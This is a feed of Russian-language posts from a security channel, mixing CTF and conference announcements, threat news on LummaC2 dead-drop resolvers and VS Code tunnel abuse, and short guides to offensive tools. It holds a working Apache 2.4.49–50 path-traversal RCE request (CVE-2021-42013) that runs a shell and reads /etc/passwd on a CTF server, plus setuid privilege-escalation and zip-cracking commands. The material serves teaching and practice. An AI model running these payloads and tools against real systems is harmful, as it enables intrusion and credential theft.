Codeby

Завершилась международная кибербитва Standoff 14 Победителем стала команда DDOST4R: Ментор команды — Магомед-Эми Межидов из Кодебай! 😎 DDOST4R уверенно завоевала первое место, обойдя сильных соперников из разных стран. 🔸 Общий призовой фонд соревнований составил $50,000. 🔸 Приз за первое место — $20,000. Второе место заняла французская команда Baguette2Pain, а третье досталось казахстанской команде mimicats, ментором которой выступил Тимур, капитан команды DreamTeam. Поздравляем победителей и участников с выдающимися результатами! #новости

🚩 Новые задания на платформе Codeby Games! 🖼 Категория Стеганография — С наивной подписью на память 🎢 Категория Разное — Форрест Гамп 🌍 Категория Веб — Квантовый прорыв Приятного хакинга!

🎄 Новогодний CTF от S.E. x Codeby! 🎄 2 декабря стартует CTF от @Social_Engineering и Академии Кодебай при поддержке codeby.games 🚩 Решайте CTF-таски и получайте ключи до 29 декабря! Каждый ключ — шанс получить главный приз! Всего 10 заданий! Какие призы? 🎁 🔸Курс «Боевой OSINT» 🔸Курс «Специалист Security Operation Center» 🔸Flipper Zero 🔸x10 Telegram Premium 🔸х10 подписок на Codeby Games Как участвовать? 1️⃣ Подпишитесь на @Social_Engineering и Codeby 2️⃣ Ловите ссылку на наш Бот в следующих постах! 3️⃣ Следите за анонсами новых заданий в нашем канале! Розыгрыш пройдет 30 декабря — не упустите свой приз!

Что такое Shadow AI? Это использование сотрудниками несанкционированных или неутвержденных компанией AI-приложений для решения рабочих задач. Такие инструменты часто остаются вне зоны контроля IT-отделов и несут значительные риски для бизнеса. В чем проблема? Исследование Strategy Insights, охватившее 3320 директоров из большинства стран мира, показало, что: 1️⃣ 35% компаний сталкиваются с серьезными трудностями в мониторинге Shadow AI. 2️⃣ Особенно сложно контролировать такие инструменты, когда они взаимодействуют с устаревшими корпоративными системами. Почему это опасно? 1️⃣ Утечка данных: - В Samsung сотрудники случайно передали конфиденциальные данные (исходный код и заметки встреч) через ChatGPT. Это вынудило компанию полностью запретить использование генеративного AI. - По данным RiverSafe, 20% британских компаний уже столкнулись с утечками данных из-за использования Generative AI. 2️⃣ Киберугрозы: - Использование непроверенных AI-инструментов увеличивает риск взломов и распространения вредоносного ПО. - Даже IT-специалисты: 73% сотрудников в области кибербезопасности признали, что использовали неутвержденные AI-приложения (опрос Next DLP). 3️⃣ Регуляторные штрафы: - Компании из высокорегулируемых отраслей (здравоохранение, финансы) особенно уязвимы перед проверками и могут понести значительные штрафы за несоблюдение стандартов безопасности. Как компании решают проблему? 🔸 Honey tokens: “метки-приманки” помогают отслеживать утечки данных в AI-системах. 🔸 Обучение сотрудников: 48% опрошенных уверены, что сотрудники должны лучше понимать риски использования AI. 🔸 Создание регуляций: 67% компаний отметили важность внедрения четких и гибких правил управления AI.

🗣️ Йохан Остхейзен из Strategy Insights подчеркивает: "Организациям необходимо выстроить эффективную систему мониторинга, которая отслеживает использование AI на всех уровнях, не нарушая при этом баланс между безопасностью и конфиденциальностью сотрудников".

Почему это важно? В условиях стремительного развития AI-технологий компании не могут игнорировать Shadow AI. Без четкой стратегии это превращается в "черный ящик", способный спровоцировать утечки, штрафы и подорвать репутацию. А как ваша компания работает с Generative AI? Поделитесь опытом в комментариях! #новости

Спойлерим программу NGENIX ICEBREAKER 2024 Уже 4 декабря в 11:00 пройдет IV ежегодная онлайн-конференция о веб-безопасности ICEBREAKER 2024. Участие бесплатное. Узнать о конфе больше и зарегистрироваться https://t.me/ru_websecurity Спикеры мероприятия — эксперты NGENIX и гости из СОЛАР, Positive Technologies, Jet, Вэбмониторэкс и других известных компаний в мире информационной безопасности. В программе ICEBREAKER 2024 выступления, которые помогут вам оставаться на шаг впереди злоумышленников: - пленарная секция — дискуссия об импортозамещении, актуальных вопросах и трендах в области кибербезопасности; - защита веба от киберугроз — практические советы, стратегии и инструменты для борьбы с продвинутыми ботами, атаками на API и другими угрозами; - доступность веб-ресурсов — сервисы для обеспечения бесперебойной работы сайтов и приложений. Присоединяйтесь к NGENIX ICEBREAKER 2024 - https://clck.ru/3EZGWP

Masscan 🕸 Masscan - это массовый сканер IP портов. Отправляя 10 миллионов пакетов в секунду, он может сканировать весь интернет за 6 минут. Этот инструмент полезен для обзора сетей большого масштаба — таких как Интернет или внутренние сети. Хотя скорость по умолчанию ограничена 100 пакетами в секунду, программа может разгоняться до 25 миллионов пакетов в секунду, при такой скорости весь (по одному порту на IP) Интернет будет просканирован за 3 минуты. Он создаёт результат схожий с nmap. Внутри он работает подобно scanrand, unicornscan и ZMap, используя асинхронную передачу. Чтобы его использовать, нужно ввести следующую команду:

masscan -p22,80,445 <IP>/24

Уже завтра, 29 ноября, с 11:00 до 19:00 МСК пройдет онлайн-конференция GetNet Некоторые доклады: - "Литературно-комиксовая зарисовка для любителей Mikrotik" – как DevOps изменяет сетевые технологии. - "Вредные советы для сетевиков" – частые ошибки в управлении сетями и как их избегать. - "Проблема ближнего радиуса" – углубляемся в безопасность с MikroTik RouterOS. - "Средний бизнес — это маленький вайфай" – эффективное управление Wi-Fi для средних предприятий. Заходите на огонек !

Вы когда-нибудь замечали странные профили среди ваших друзей в Steam с именами, похожими на случайные наборы символов? Возможно, это не просто шутка, а часть сложной кибератаки.

Расследование Solar4Rays проливает свет на то, как злоумышленники используют платформы вроде Steam и Telegram в сочетании с техникой Dead Drop Resolver (DDR), чтобы скрыть адреса своих C2 (Command and Control) серверов.

❓ Что такое C2 C2, или сервер управления и контроля, — ключевой элемент кибератаки. Именно через него злоумышленники общаются с заражёнными устройствами, координируют действия вредоносного ПО и извлекают украденные данные. Один из изощрённых методов — техника T1102.001 Dead Drop Resolver: 🔸 Вместо прямого указания на C2, вредоносный код извлекает данные из публичных сервисов. 🔸 Например, адрес сервера может быть зашифрован и спрятан в имени профиля пользователя Steam. Как работает DDR на примере LummaC2 LummaC2 — это инструмент, активно используемый для кражи данных, таких как cookie браузеров, криптовалютные кошельки и данные 2FA. Злоумышленники используют следующую схему: 1️⃣ Создание C2-сервера: настраивают сервер для управления атакой. 2️⃣ Маскировка ссылки: размещают зашифрованный адрес C2 в имени профиля Steam. 3️⃣ Заражение жертвы: жертва может случайно запустить вредоносное ПО, считав скрытый адрес C2 с профиля злоумышленника. 4️⃣ Кража данных: после установки связь между устройством жертвы и C2 сервером открыта, начинается передача украденной информации. Техника Dead Drop Resolver идеально маскируется под легитимную активность. Steam, как платформа с миллионами пользователей, становится удобным местом для размещения скрытых команд, которые сложно отследить. ⏩Читать подробнее

Студенческий ИТ-чемпионат «Кибербезопасность в финансах» от Банка России – соревнование для молодых специалистов в сфере информационной безопасности. В программе поиск флагов в CTF-задачах, решение аналитической задачи, а в финале – тематический кейс-чемпионат и сражение на киберполигоне в Екатеринбурге! Собирайте команду единомышленников и включайтесь в борьбу за призовой фонд – 1 000 000 рублей. Регистрация Приглашаем к участию студенческие команды из 4 или 5 человек. Подать заявку и присоединиться к яркому событию в мире инфобеза можно до 4 декабря. Соревнование пройдет в 2 этапа: онлайн-отбор и офлайн-финал на форуме «Кибербезопасность в финансах» в Екатеринбурге! Сначала на платформе Codenrock пройдет онлайн-этап (6-8 декабря): 🔹Четыре CTF-задачи – находите флаги, зарабатывайте баллы.   🔹Аналитическая задача – обнаружьте уязвимость в системе и предложите варианты защиты. Лучшие 10 команд отборочного этапа будут объявлены уже 10 декабря и приглашены в Екатеринбург, где пройдет офлайн-финал (16-21 февраля) соревнования, включающий: 🔹Подготовку и защиту ИБ-кейса – за 2 месяца до очного этапа участники получат уникальную тему, которую необходимо проработать и презентовать жюри.  🔹Киберполигон – соревнование с лучшими соперниками и защита банка от киберугроз в реальном времени.  Финал чемпионата пройдет в рамках большого события федерального уровня – Уральского форума «Кибербезопасность в финансах» от Банка России. Регистрация открыта до 4 декабря

Yersinia 🕸 Платформа для проведения атак второго уровня. Он предназначен для использования некоторых недостатков различных сетевых протоколов. Он претендует на роль надежной основы для анализа и тестирования развернутых сетей и систем.

Yersinia получила название в честь бактерий иерсиний и стала сетевой утилитой, которая разработана для использования уязвимых сетевых протоколов под видом безопасной сетевой системы анализа и тестирования.

В данной версии реализованы атаки на следующие сетевые протоколы:

Протокол связующего дерева (STP).
Протокол обнаружения Cisco (CDP).
Динамический транкинговый протокол (DTP).
Протокол динамической конфигурации хоста (DHCP).
Протокол маршрутизатора горячего резерва (HSRP).
802.1к.
802.1х.
Протокол межкоммутаторного соединения (ISL).
Транкинговый протокол VLAN (VTP).

Запуск с графическим интерфейсом:

yersinia -G

Специалисты Unit42 исследовали использование кибергруппировкой Stately Taurus встроенной функции обратной оболочки Visual Studio Code. 🔎 Злоумышленники используют её для следующих целей: ⏺️выполнение произвольного кода и предоставление дополнительной полезной нагрузки; ⏺️доставка вредоносного ПО в зараженные среды; ⏺️проведение разведки; ⏺️извлечение конфиденциальных данных. ✏️ Для использования Visual Studio Code во вредоносных целях, злоумышленник может использовать переносимую версию code.exe (исполняемый файл для Visual Studio Code) или уже установленную версию программного обеспечения. 👀 Выполнив команду code.exe tunnel, злоумышленник получает ссылку, которая требует от него войти в GitHub под своей учетной записью. После входа в систему злоумышленник перенаправляется в веб-среду Visual Studio Code, подключенную к взломанному компьютеру. Затем ему разрешается выполнять команды и сценарии, а также создавать новые файлы на зараженном компьютере. 🚨 Для мониторинга данной угрозы в системе Windows можно использовать правила появления в журнале безопасности событий со следующими параметрами:

Event ID = 4688, Parent Process name содержит: «cmd.exe», New Process Name содержит "cmd" или ''powershell'. Event ID = 4663, Object Name содержит строку в формате %UserProfile%\.vscode-cli\code_tunnel.json

SSH Запуск SSH и добавление его в автозагрузку делается следующими командами:

sudo systemctl enable sshd.service --now

или

sudo service ssh start

Для остановки демона замените start на stop, для перезапуска restart, для вывода статуса - status. По умолчанию порт работы SSH - 22. По умолчанию, все пользователи, кроме root, могут удалённо осуществлять вход по SSH:

ssh username@IP -p 22

Если вам необходимо подключиться к root удалённо, зайдите в конфигурационный файл и на пункте PermitRootLogin установите значение Yes.

Делать так я настоятельно не рекомендую.

В 1998 году криптограф Даниэль Блейхенбахер обнаружил серьёзную уязвимость в реализации RSA-шифрования (PKCS#1 v1.5), используемой в SSL 2.0/3.0. Атака, получившая название Bleichenbacher's Attack или «атака миллиона сообщений», позволяла злоумышленникам расшифровывать данные без знания закрытого ключа. Суть атаки заключалась в использовании оракула — сервера, который при расшифровке указывал, соответствует ли сообщение стандарту PKCS. Злоумышленник, адаптивно изменяя шифротекст и анализируя ответы оракула, мог частями восстанавливать зашифрованный текст. Это полностью компрометировало конфиденциальность SSL. 🤖 Возвращение проблемы В 2017 году на смену «атаке миллиона сообщений» пришёл ROBOT (Return Of Bleichenbacher’s Oracle Threat). Исследователи обнаружили, что многие серверы до сих пор не корректно реализуют защиту RSA в соответствии с рекомендациями RFC 5246 для TLS. ROBOT использует те же принципы, что и атака Блейхенбахера, но с учётом современных реалий: 🔸 Распознавание различных типов ошибок сервера (тайм-ауты, сброс соединения, дублирующиеся оповещения TLS). 🔸 Возможность расшифровки текста или создания цифровой подписи от имени сервера. 🛡 Чем опасен ROBOT? Хотя современные TLS-соединения чаще используют обмен ключами Диффи-Хеллмана на эллиптических кривых (ECDHE), уязвимые реализации RSA всё ещё встречаются, особенно в старом оборудовании или плохо обновляемых системах.

Важно понимать, что атака ROBOT не связана со стойкостью RSA как такового — она эксплуатирует только ошибки в реализации PKCS#1 v1.5.

Как защититься: 🔸Переходите на TLS 1.3. Этот протокол полностью исключает использование уязвимого режима шифрования. 🔸Проверяйте серверы. Исследователи ROBOT опубликовали на GitHub Python-скрипт для проверки уязвимости. Дополнительно можно использовать инструмент tlsfuzzer. 🔸Обновляйте оборудование и ПО. Устаревшие системы с некорректной реализацией TLS чаще всего подвержены этим атакам. ➡️ Читать подробнее

fcrackzip 📂 Данный иснтрумент взламывает запароленные zip архивы. По умолчанию программа не установлена, устанавливаем:

sudo apt install fcrackzip

после этого запускаем с каким нибудь архивом:

fcrackzip archive.zip

Программа начнёт перебор возможных комбинаций паролей, и придётся подождать. Время ожидания зависит от сложности пароля. Программа выдаст следующий результат по завершению.

possible pw found: 123456seven

Где, 123456seven - и есть наш пароль.

Поиск файлов в Linux🔍 Существует несколько способов поиска файлов в Linux. Три основых - это команды locate, find и which. Команда locate хранит свои данные в базе данных, потому при поиске работает быстрее. Для начала нужно её обновить:

updatedb

Теперь можем использовать команду locate:

locate [ИМЯ ФАЙЛА]

Если результатов слишком много, используйте ключ -n для того, чтобы ограничить вывод. Комбинируйте это с командой grep о которой я рассказал тут и тогда вы получите больше примуществ. Чтобы найти путь к файлу, введите команду which. Она использует переменную среды $PATH для поиска результатов. Например, чтобы узнать где установлена та или иная программа, введите:

which [ИМЯ ПРОГРАММЫ]

Преимущество команды find является её возможность добавлять более детальные фильтры, что найти что-то. Например, чтобы найти файл в корневом каталоге, можно использовать:

find /home/user/ -name "file.txt"

Или, если вы хотите найти большие файлы, то можно воспользоваться ключом -size:

find / -size +1G 2> /dev/null

2> /dev/null очистит вывод и отфильтрует ошибки

Можно также найти файлы setuid в Linux для повышения привелегий.

find / -perm -u=s -type f 2>/dev/null

🔄 💻 tartufo 5.0.2 🔸Поиск в репозиториях git строк и секретов основываясь на энтропии. 🔸Проверяет историю коммитов и т.д. 🔸Похож на trufflehog, но мне понравился даже больше в РУ реалиях. 🔸Написан на Python 🐍 Установка:

pip install tartufo

Есть несколько режимов:

tartufo scan-folder [OPTIONS] TARGET
tartufo scan-local-repo [OPTIONS] REPO_PATH
tartufo scan-remote-repo [OPTIONS] GIT_URL

В основном интересен scan-remote-repo, проверил на своем репозитории, забыл убрать токен телеграм бота, на скрине все видно

tartufo scan-remote-repo https://github.com/akhomlyuk/pyradm

Токены заменены!

SQLMC 💉 SQLMC (SQL Injection Massive Checker) — это инструмент, предназначенный для сканирования домена на предмет уязвимостей SQL-инъекций. Он сканирует указанный URL-адрес до указанной глубины, проверяет каждую ссылку на наличие уязвимостей SQL-инъекций и сообщает о своих результатах. Использование sqlmc:

-u, --url: Сканирует URL -d, --depth: Глубина сканирования -o, --output: Сохранить файл с выводом

Например:

sqlmc -u http://example.com -d 2

⚙️ Jaeles v0.17.1 Мощный, гибкий и легко расширяемый framework, написанный на 🖼️ Go для создания собственного сканера веб-приложений. Работает с .yaml шаблонами и чем то похож на nuclei. Установка:

go install github.com/jaeles-project/jaeles@latest

Установка сигнатур:

jaeles config init

Примеры запуска:

# Scan Usage example:
jaeles scan -s <signature> -u <url>
jaeles scan -c 50 -s <signature> -U <list_urls> -L <level-of-signatures>
jaeles scan -c 50 -s <signature> -U <list_urls>
jaeles scan -c 50 -s <signature> -U <list_urls> -p 'dest=xxx.burpcollaborator.net'
jaeles scan -c 50 -s <signature> -U <list_urls> -f 'noti_slack "{{.vulnInfo}}"'
jaeles scan -v -c 50 -s <signature> -U list_target.txt -o /tmp/output
jaeles scan -s <signature> -s <another-selector> -u http://example.com
jaeles scan -G -s <signature> -s <another-selector> -x <exclude-selector> -u http://example.com

cat list_target.txt | jaeles scan -c 100 -s <signature>


# Examples:
jaeles scan -s 'jira' -s 'ruby' -u target.com
jaeles scan -c 50 -s 'java' -x 'tomcat' -U list_of_urls.txt
jaeles scan -G -c 50 -s '/tmp/custom-signature/.*' -U list_of_urls.txt
jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com' -p 'root=[[.URL]]'

cat urls.txt | grep 'interesting' | jaeles scan -L 5 -c 50 -s 'fuzz/.*' -U list_of_urls.txt --proxy http://127.0.0.1:8080

jaeles server -s '/tmp/custom-signature/sensitive/.*' -L 2 --fi

Написал шаблон под RCE для веб сервера Apache 2.4.49-50 Задание на codeby.games с уязвимым сервером. На нем и проверим. Запрос curl'ом выглядит так:

curl 'http://62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; id && cat /etc/passwd'

Запуск:

./jaeles scan -s '~/.jaeles/base-signatures/cves/apache-rce-cve-2021-42013*' -u 'http://62.173.140.174:10009' -v

Кладем в директорию сигнатур и инициализируем конфиг:

./jaeles config init

🚩 Новые задания на платформе Codeby Games! 🕵️ Категория Форензика — В чём секрет кота Бориса? 🏆 Категория Квесты — SSL 🧰 Категория PWN — 0xLEET Приятного хакинга!